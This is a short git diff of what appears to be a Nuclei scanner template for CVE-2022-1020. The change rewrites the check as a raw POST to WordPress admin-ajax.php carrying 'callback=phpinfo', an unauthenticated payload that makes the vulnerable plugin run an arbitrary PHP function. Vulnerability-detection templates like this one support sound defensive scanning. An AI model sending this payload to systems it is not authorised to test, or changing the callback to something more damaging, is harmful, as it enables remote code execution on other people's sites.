Update CVE-2022-1020.yaml
parent
36bc825ad8
commit
b685ac8072
|
@ -11,9 +11,13 @@ info:
|
||||||
tags: wp,wp-plugin,wordpress,cve,cve2022,unauth
|
tags: wp,wp-plugin,wordpress,cve,cve2022,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option&option_key=a&perpose=update&callback=phpinfo'
|
POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
option_key=a&perpose=update&callback=phpinfo
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue